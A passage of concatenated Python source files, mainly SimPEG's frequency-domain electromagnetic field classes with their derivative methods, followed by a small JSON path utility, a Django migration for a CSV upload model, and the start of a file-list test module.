return self._MfMuiDeriv(self[src, "b"], (self._MfI.T * v), adjoint)
return self._MfI * (self._MfMuiDeriv(self[src, "b"], v))
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic field with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic field derivative with respect to the
inversion model with a vector
"""
# n = int(self._aveF2CCV.shape[0] / self._nC) # Number of Components
# VI = sdiag(np.kron(np.ones(n), 1./self.simulation.mesh.vol))
if adjoint:
return self._bDeriv_m(
src, self._MfMui.T * (self._MfI.T * v), adjoint=adjoint
) + self._hDeriv_mui(src, v, adjoint=adjoint)
return (
self._MfI * (self._MfMui * self._bDeriv_m(src, v, adjoint=adjoint))
) + self._hDeriv_mui(src, v, adjoint=adjoint)
class Fields3DMagneticFluxDensity(FieldsFDEM):
"""
Fields object for Simulation3DMagneticFluxDensity.
:param discretize.base.BaseMesh mesh: mesh
:param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
"""
knownFields = {"bSolution": "F"}
aliasFields = {
"b": ["bSolution", "F", "_b"],
"bPrimary": ["bSolution", "F", "_bPrimary"],
"bSecondary": ["bSolution", "F", "_bSecondary"],
"e": ["bSolution", "E", "_e"],
"ePrimary": ["bSolution", "E", "_ePrimary"],
"eSecondary": ["bSolution", "E", "_eSecondary"],
"j": ["bSolution", "E", "_j"],
"h": ["bSolution", "F", "_h"],
}
def startup(self):
self._edgeCurl = self.simulation.mesh.edgeCurl
self._MeSigma = self.simulation.MeSigma
self._MeSigmaI = self.simulation.MeSigmaI
self._MfMui = self.simulation.MfMui
self._MfMuiDeriv = self.simulation.MfMuiDeriv
self._MeSigmaDeriv = self.simulation.MeSigmaDeriv
self._MeSigmaIDeriv = self.simulation.MeSigmaIDeriv
self._Me = self.simulation.Me
self._aveF2CCV = self.simulation.mesh.aveF2CCV
self._aveE2CCV = self.simulation.mesh.aveE2CCV
self._sigma = self.simulation.sigma
self._mui = self.simulation.mui
self._nC = self.simulation.mesh.nC
self._MeI = self.simulation.MeI
self._MfI = self.simulation.MfI
def _GLoc(self, fieldType):
if fieldType in ["e", "eSecondary", "ePrimary", "j"]:
return "E"
elif fieldType in ["b", "bSecondary", "bPrimary", "h"]:
return "F"
else:
raise Exception("Field type must be e, b, h, j")
def _bPrimary(self, bSolution, source_list):
"""
Primary magnetic flux density from source
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
bPrimary = np.zeros([self.simulation.mesh.nF, len(source_list)], dtype=complex)
for i, src in enumerate(source_list):
bp = src.bPrimary(self.simulation)
bPrimary[:, i] = bPrimary[:, i] + bp
return bPrimary
def _bSecondary(self, bSolution, source_list):
"""
Secondary magnetic flux density is the thing we solved for
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
return bSolution
def _bDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the total magnetic flux density with respect to
the thing we solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the field we solved for with a vector
"""
return Identity() * du_dm_v
def _bDeriv_m(self, src, v, adjoint=False):
"""
Partial derivative of the total magnetic flux density with respect to
the inversion model. Here, we assume that the primary does not depend
on the model. Note that this also includes derivative contributions
from the sources.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.utils.Zero
:return: product of the magnetic flux density derivative with respect
to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _ePrimary(self, bSolution, source_list):
"""
Primary electric field from source
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros(
[self._edgeCurl.shape[1], bSolution.shape[1]], dtype=complex
)
for i, src in enumerate(source_list):
ep = src.ePrimary(self.simulation)
ePrimary[:, i] = ePrimary[:, i] + ep
return ePrimary
def _eSecondary(self, bSolution, source_list):
"""
Secondary electric field from bSolution
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
e = self._edgeCurl.T * (self._MfMui * bSolution)
for i, src in enumerate(source_list):
s_e = src.s_e(self.simulation)
e[:, i] = e[:, i] + -s_e
return self._MeSigmaI * e
def _eDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the electric field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the field we solved for with a vector
"""
if not adjoint:
return self._MeSigmaI * (self._edgeCurl.T * (self._MfMui * du_dm_v))
return self._MfMui.T * (self._edgeCurl * (self._MeSigmaI.T * du_dm_v))
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the electric field with respect to the inversion model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the model with a vector
"""
bSolution = mkvc(self[src, "bSolution"])
s_e = src.s_e(self.simulation)
w = -s_e + self._edgeCurl.T * (self._MfMui * bSolution)
if adjoint:
s_eDeriv = src.s_eDeriv(self.simulation, self._MeSigmaI.T * v, adjoint)
return (
self._MeSigmaIDeriv(w, v, adjoint)
+ self._MfMuiDeriv(
bSolution, self._edgeCurl * (self._MeSigmaI.T * v), adjoint
)
- s_eDeriv
+ src.ePrimaryDeriv(self.simulation, v, adjoint)
)
s_eDeriv = src.s_eDeriv(self.simulation, v, adjoint)
return (
self._MeSigmaIDeriv(w, v)
+ self._MeSigmaI * (self._edgeCurl.T * self._MfMuiDeriv(bSolution, v))
- self._MeSigmaI * s_eDeriv
+ src.ePrimaryDeriv(self.simulation, v, adjoint)
)
def _j(self, bSolution, source_list):
"""
Secondary current density from bSolution
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary current density
"""
n = int(self._aveE2CCV.shape[0] / self._nC) # number of components
VI = sdiag(np.kron(np.ones(n), 1.0 / self.simulation.mesh.vol))
j = self._edgeCurl.T * (self._MfMui * bSolution)
for i, src in enumerate(source_list):
s_e = src.s_e(self.simulation)
j[:, i] = j[:, i] - s_e
return self._MeI * j
def _jDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the current density with respect to the thing we
solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the field we solved for with a vector
"""
if adjoint:
return self._MfMui.T * (self._edgeCurl * (self._MeI.T * du_dm_v))
return self._MeI * (self._edgeCurl.T * (self._MfMui * du_dm_v))
# forgetting the source term here
def _jDeriv_mui(self, src, v, adjoint=False):
if adjoint:
return self._MfMuiDeriv(
self[src, "b"], (self._edgeCurl * (self._MeI.T * v)), adjoint
)
return self._MeI * (self._edgeCurl.T * self._MfMuiDeriv(self[src, "b"], v))
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the current density with respect to the inversion model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the model with a vector
"""
return self._jDeriv_mui(src, v, adjoint)
def _h(self, bSolution, source_list):
"""
Magnetic field from bSolution
:param numpy.ndarray bSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: magnetic field
"""
return self._MfI * (self._MfMui * self._b(bSolution, source_list))
def _hDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the magnetic field with respect to the thing we
solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the field we solved for with a vector
"""
if adjoint:
return self._MfMui.T * (self._MfI.T * du_dm_v)
return self._MfI * (self._MfMui * du_dm_v)
def _hDeriv_mui(self, src, v, adjoint=False):
b = self[src, "b"]
if adjoint:
return self._MfMuiDeriv(b, self._MfI.T * v, adjoint)
return self._MfI * self._MfMuiDeriv(b, v)
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic field with respect to the inversion model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the model with a vector
"""
return src.hPrimaryDeriv(self.simulation, v, adjoint) + self._hDeriv_mui(
src, v, adjoint
)
class Fields3DCurrentDensity(FieldsFDEM):
"""
Fields object for Simulation3DCurrentDensity.
:param discretize.base.BaseMesh mesh: mesh
:param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
"""
knownFields = {"jSolution": "F"}
aliasFields = {
"j": ["jSolution", "F", "_j"],
"jPrimary": ["jSolution", "F", "_jPrimary"],
"jSecondary": ["jSolution", "F", "_jSecondary"],
"h": ["jSolution", "E", "_h"],
"hPrimary": ["jSolution", "E", "_hPrimary"],
"hSecondary": ["jSolution", "E", "_hSecondary"],
"e": ["jSolution", "F", "_e"],
"b": ["jSolution", "E", "_b"],
}
def startup(self):
self._edgeCurl = self.simulation.mesh.edgeCurl
self._MeMu = self.simulation.MeMu
self._MeMuI = self.simulation.MeMuI
self._MeMuIDeriv = self.simulation.MeMuIDeriv
self._MfRho = self.simulation.MfRho
self._MfRhoDeriv = self.simulation.MfRhoDeriv
self._rho = self.simulation.rho
self._mu = self.simulation.mui
self._aveF2CCV = self.simulation.mesh.aveF2CCV
self._aveE2CCV = self.simulation.mesh.aveE2CCV
self._nC = self.simulation.mesh.nC
self._MeI = self.simulation.MeI
self._MfI = self.simulation.MfI
def _GLoc(self, fieldType):
if fieldType in ["h", "hSecondary", "hPrimary", "b"]:
return "E"
elif fieldType in ["j", "jSecondary", "jPrimary", "e"]:
return "F"
else:
raise Exception("Field type must be e, b, h, j")
def _jPrimary(self, jSolution, source_list):
"""
Primary current density from source
:param numpy.ndarray jSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros_like(jSolution, dtype=complex)
for i, src in enumerate(source_list):
jp = src.jPrimary(self.simulation)
jPrimary[:, i] = jPrimary[:, i] + jp
return jPrimary
def _jSecondary(self, jSolution, source_list):
"""
Secondary current density is the thing we solved for
:param numpy.ndarray jSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
return jSolution
def _j(self, jSolution, source_list):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray jSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
return self._jPrimary(jSolution, source_list) + self._jSecondary(
jSolution, source_list
)
def _jDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the total current density with respect to the
thing we solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the field we solved for with a vector
"""
return Identity() * du_dm_v
def _jDeriv_m(self, src, v, adjoint=False):
"""
Partial derivative of the total current density with respect to the
inversion model. Here, we assume that the primary does not depend on
the model. Note that this also includes derivative contributions from
the sources.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.utils.Zero
:return: product of the current density derivative with respect to the
inversion model with a vector
"""
# assuming primary does not depend on the model
return src.jPrimaryDeriv(self.simulation, v, adjoint)
def _hPrimary(self, jSolution, source_list):
"""
Primary magnetic field from source
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros(
[self._edgeCurl.shape[1], jSolution.shape[1]], dtype=complex
)
for i, src in enumerate(source_list):
hp = src.hPrimary(self.simulation)
hPrimary[:, i] = hPrimary[:, i] + hp
return hPrimary
def _hSecondary(self, jSolution, source_list):
"""
Secondary magnetic field from bSolution
:param numpy.ndarray jSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
h = self._edgeCurl.T * (self._MfRho * jSolution)
for i, src in enumerate(source_list):
h[:, i] *= -1.0 / (1j * omega(src.frequency))
s_m = src.s_m(self.simulation)
h[:, i] = h[:, i] + 1.0 / (1j * omega(src.frequency)) * (s_m)
return self._MeMuI * h
def _hDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the field we solved for with a vector
"""
if adjoint:
return (
-1.0
/ (1j * omega(src.frequency))
* self._MfRho.T
* (self._edgeCurl * (self._MeMuI.T * du_dm_v))
)
return (
-1.0
/ (1j * omega(src.frequency))
* self._MeMuI
* (self._edgeCurl.T * (self._MfRho * du_dm_v))
)
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic field with respect to the inversion model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the model with a vector
"""
jSolution = mkvc(self[[src], "jSolution"])
MeMuI = self._MeMuI
MeMuIDeriv = self._MeMuIDeriv
C = self._edgeCurl
MfRho = self._MfRho
MfRhoDeriv = self._MfRhoDeriv
s_m = src.s_m(self.simulation)
def s_mDeriv(v):
return src.s_mDeriv(self.simulation, v, adjoint=adjoint)
if not adjoint:
hDeriv_m = (
1.0
/ (1j * omega(src.frequency))
* (
-1.0
* (
MeMuI * (C.T * (MfRhoDeriv(jSolution, v, adjoint)))
+ MeMuIDeriv(C.T * (MfRho * jSolution)) * v
)
+ MeMuI * s_mDeriv(v)
+ MeMuIDeriv(s_m) * v
)
)
elif adjoint:
hDeriv_m = (
1.0
/ (1j * omega(src.frequency))
* (
(
-1.0
* (
MfRhoDeriv(jSolution).T * (C * (MeMuI.T * v))
+ MeMuIDeriv(C.T * (MfRho * jSolution)).T * v
)
)
+ s_mDeriv(MeMuI.T * v)
+ MeMuIDeriv(s_m).T * v
)
)
return hDeriv_m + src.hPrimaryDeriv(self.simulation, v, adjoint)
def _e(self, jSolution, source_list):
"""
Electric field from jSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: electric field
"""
return self._MfI * (self._MfRho * self._j(jSolution, source_list))
def _eDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the electric field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the field we solved for with a vector
"""
if adjoint:
return self._MfRho.T * (self._MfI.T * du_dm_v)
return self._MfI * (self._MfRho * du_dm_v)
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the electric field with respect to the inversion model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the model with a vector
"""
jSolution = mkvc(self[src, "jSolution"])
if adjoint:
return self._MfRhoDeriv(jSolution).T * (
self._MfI.T * v
) + src.ePrimaryDeriv(self.simulation, v, adjoint)
return self._MfI * (self._MfRhoDeriv(jSolution) * v) + src.ePrimaryDeriv(
self.simulation, v, adjoint
)
def _b(self, jSolution, source_list):
"""
Secondary magnetic flux density from jSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
return self._MeI * (self._MeMu * self._h(jSolution, source_list))
def _bDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the thing we
solved for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the field we solved for with a vector
"""
if adjoint:
return (
-1.0
/ (1j * omega(src.frequency))
* self._MfRho.T
* (self._edgeCurl * (self._MeI.T * du_dm_v))
)
return (
-1.0
/ (1j * omega(src.frequency))
* (self._MeI * (self._edgeCurl.T * (self._MfRho * du_dm_v)))
)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the inversion
model
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the model with a vector
"""
jSolution = self[src, "jSolution"]
def s_mDeriv(v):
return src.s_mDeriv(self.simulation, v, adjoint=adjoint)
if adjoint:
v = self._MeI.T * v
return 1.0 / (1j * omega(src.frequency)) * (
s_mDeriv(v) - self._MfRhoDeriv(jSolution, self._edgeCurl * v, adjoint)
) + src.bPrimaryDeriv(self.simulation, v, adjoint)
return 1.0 / (1j * omega(src.frequency)) * self._MeI * (
s_mDeriv(v) - self._edgeCurl.T * self._MfRhoDeriv(jSolution, v, adjoint)
) + src.bPrimaryDeriv(self.simulation, v, adjoint)
class Fields3DMagneticField(FieldsFDEM):
"""
Fields object for Simulation3DMagneticField.
:param discretize.base.BaseMesh mesh: mesh
:param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
"""
knownFields = {"hSolution": "E"}
aliasFields = {
"h": ["hSolution", "E", "_h"],
"hPrimary": ["hSolution", "E", "_hPrimary"],
"hSecondary": ["hSolution", "E", "_hSecondary"],
"j": ["hSolution", "F", "_j"],
"jPrimary": ["hSolution", "F", "_jPrimary"],
"jSecondary": ["hSolution", "F", "_jSecondary"],
"e": ["hSolution", "CCV", "_e"],
"b": ["hSolution", "CCV", "_b"],
}
def startup(self):
self._edgeCurl = self.simulation.mesh.edgeCurl
self._MeMu = self.simulation.MeMu
self._MeMuDeriv = self.simulation.MeMuDeriv
# self._MeMuI = self.simulation.MeMuI
self._MfRho = self.simulation.MfRho
self._MfRhoDeriv = self.simulation.MfRhoDeriv
self._rho = self.simulation.rho
self._mu = self.simulation.mui
self._aveF2CCV = self.simulation.mesh.aveF2CCV
self._aveE2CCV = self.simulation.mesh.aveE2CCV
self._nC = self.simulation.mesh.nC
self._MfI = self.simulation.MfI
self._MeI = self.simulation.MeI
def _GLoc(self, fieldType):
if fieldType in ["h", "hSecondary", "hPrimary", "b"]:
return "E"
elif fieldType in ["j", "jSecondary", "jPrimary", "e"]:
return "F"
else:
raise Exception("Field type must be e, b, h, j")
def _hPrimary(self, hSolution, source_list):
"""
Primary magnetic field from source
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros_like(hSolution, dtype=complex)
for i, src in enumerate(source_list):
hp = src.hPrimary(self.simulation)
hPrimary[:, i] = hPrimary[:, i] + hp
return hPrimary
def _hSecondary(self, hSolution, source_list):
"""
Secondary magnetic field is the thing we solved for
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
return hSolution
def _hDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Partial derivative of the total magnetic field with respect to the
thing we solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the field we solved for with a vector
"""
return Identity() * du_dm_v
def _hDeriv_m(self, src, v, adjoint=False):
"""
Partial derivative of the total magnetic field with respect to the
inversion model. Here, we assume that the primary does not depend
on the model. Note that this also includes derivative contributions
from the sources.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.utils.Zero
:return: product of the magnetic field derivative with respect to the
inversion model with a vector
"""
return src.hPrimaryDeriv(self.simulation, v, adjoint)
def _jPrimary(self, hSolution, source_list):
"""
Primary current density from source
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros(
[self._edgeCurl.shape[0], hSolution.shape[1]], dtype=complex
)
for i, src in enumerate(source_list):
jp = src.jPrimary(self.simulation)
jPrimary[:, i] = jPrimary[:, i] + jp
return jPrimary
def _jSecondary(self, hSolution, source_list):
"""
Secondary current density from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
j = self._edgeCurl * hSolution
for i, src in enumerate(source_list):
s_e = src.s_e(self.simulation)
j[:, i] = j[:, i] + -s_e
return j
def _jDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the current density with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the field we solved for with a vector
"""
if not adjoint:
return self._edgeCurl * du_dm_v
elif adjoint:
return self._edgeCurl.T * du_dm_v
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the current density with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the current density derivative with respect to the
inversion model with a vector
"""
return -src.s_eDeriv(self.simulation, v, adjoint) + src.jPrimaryDeriv(
self.simulation, v, adjoint
)
def _e(self, hSolution, source_list):
"""
Electric field from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: electric field
"""
return self._MfI * (self._MfRho * self._j(hSolution, source_list))
def _eDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the electric field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the field we solved for with a vector
"""
if adjoint:
return self._edgeCurl.T * (self._MfRho.T * (self._MfI * du_dm_v))
return self._MfI * (self._MfRho * self._edgeCurl * du_dm_v)
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the electric field with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the electric field derivative with respect to the
inversion model with a vector
"""
hSolution = mkvc(self[src, "hSolution"])
s_e = src.s_e(self.simulation)
if adjoint:
w = self._MfI.T * v
return (
self._MfRhoDeriv(self._edgeCurl * hSolution, w, adjoint)
- self._MfRhoDeriv(s_e, w, adjoint)
+ src.ePrimaryDeriv(self.simulation, v, adjoint)
)
return self._MfI * (
self._MfRhoDeriv(self._edgeCurl * hSolution, v) - self._MfRhoDeriv(s_e, v)
) + src.ePrimaryDeriv(self.simulation, v, adjoint)
def _b(self, hSolution, source_list):
"""
Magnetic flux density from hSolution
:param numpy.ndarray hSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: magnetic flux density
"""
h = self._h(hSolution, source_list)
return self._MeI * (self._MeMu * h)
def _bDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the thing we
solved for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the field we solved for with a vector
"""
if adjoint:
return self._MeMu.T * (self._MeI.T * du_dm_v)
return self._MeI * (self._MeMu * du_dm_v)
def _bDeriv_mu(self, src, v, adjoint=False):
h = self[src, "h"]
if adjoint:
return self._MeMuDeriv(h, self._MeI.T * v, adjoint)
return self._MeI * self._MeMuDeriv(h, v)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the inversion
model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic flux density derivative with respect
to the inversion model with a vector
"""
return src.bPrimaryDeriv(self.simulation, v, adjoint) + self._bDeriv_mu(
src, v, adjoint
)
############
# Deprecated
############
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_e(Fields3DElectricField):
pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_b(Fields3DMagneticFluxDensity):
pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_j(Fields3DCurrentDensity):
pass
@deprecate_class(removal_version="0.16.0", error=True)
class Fields3D_h(Fields3DMagneticField):
pass
| 36.511688 | 88 | 0.603472 |
01c18461479785834fd44b4712cba45a68b60a96 | 246 | py | Python | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | 1 | 2019-01-22T05:36:23.000Z | 2019-01-22T05:36:23.000Z | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | null | null | null | end-to-end/jget.py | tesserai/ambassador | 70fadc62872be9b041b90cba54d3920a21777548 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import json
import dpath.util
x = json.load(sys.stdin)
y = None
try:
y = dpath.util.get(x, sys.argv[1])
print(json.dumps(y, sort_keys=True, indent=4))
sys.exit(0)
except KeyError:
sys.exit(1)
| 13.666667 | 50 | 0.654472 |
e33e7eda3109201c4cff3e74f10db30874ebb3a6 | 1,202 | py | Python | migrations/0002_auto_20191118_0710.py | khaledboka/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | null | null | null | migrations/0002_auto_20191118_0710.py | khaledboka/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | 4 | 2020-12-15T11:48:29.000Z | 2020-12-15T11:56:45.000Z | migrations/0002_auto_20191118_0710.py | cartologic/csv_manager | ed5659cacb68fa1f8a4fa474e4faf20703fbc76b | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import csv_manager.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('csv_manager', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='csvupload',
name='geometry_type',
field=models.CharField(max_length=55, null=True, choices=[(b'POINTXY', b'AS_XY'), (b'POINTXYZ', b'AS_XYZ'), (b'POINTYX', b'AS_YX'), (b'LINESTARTEND', b'start_end'), (b'LINE', b'wkbLineString'), (b'MULTILINE', b'wkbMultiLineString'), (b'MULTIPOINT', b'wkbMultiPoint'), (b'MULTIPOLYGON', b'wkbMultiPolygon'), (b'POINT', b'wkbPoint'), (b'POLYGON', b'wkbPolygon'), (b'UNKNOWN', b'wkbUnknown')]),
),
migrations.AlterField(
model_name='csvupload',
name='the_geom_field_name',
field=models.CharField(max_length=55, null=True, blank=True),
),
migrations.AlterField(
model_name='csvupload',
name='wkt_field_name',
field=models.CharField(max_length=55, null=True, validators=[csv_manager.models.valid_column_name]),
),
]
| 38.774194 | 403 | 0.630616 |
ff1605976c1595096c8665e4e3f2ab519ba6f059 | 8,566 | py | Python | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 2 | 2019-07-17T14:53:07.000Z | 2021-09-15T04:47:47.000Z | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 108 | 2018-07-24T15:20:54.000Z | 2022-03-28T16:57:39.000Z | tests/utils/file_list_test.py | elifesciences/sciencebeam-utils | 7d232885b52a80e0ffeb4ab25bdb3640bf009ba4 | [
"MIT"
] | 2 | 2020-02-07T10:58:48.000Z | 2021-09-01T10:15:32.000Z | import os
from tempfile import NamedTemporaryFile
from unittest.mock import patch
from backports.tempfile import TemporaryDirectory
import pytest
import sciencebeam_utils.utils.file_list as file_list_loader
from sciencebeam_utils.utils.file_list import (
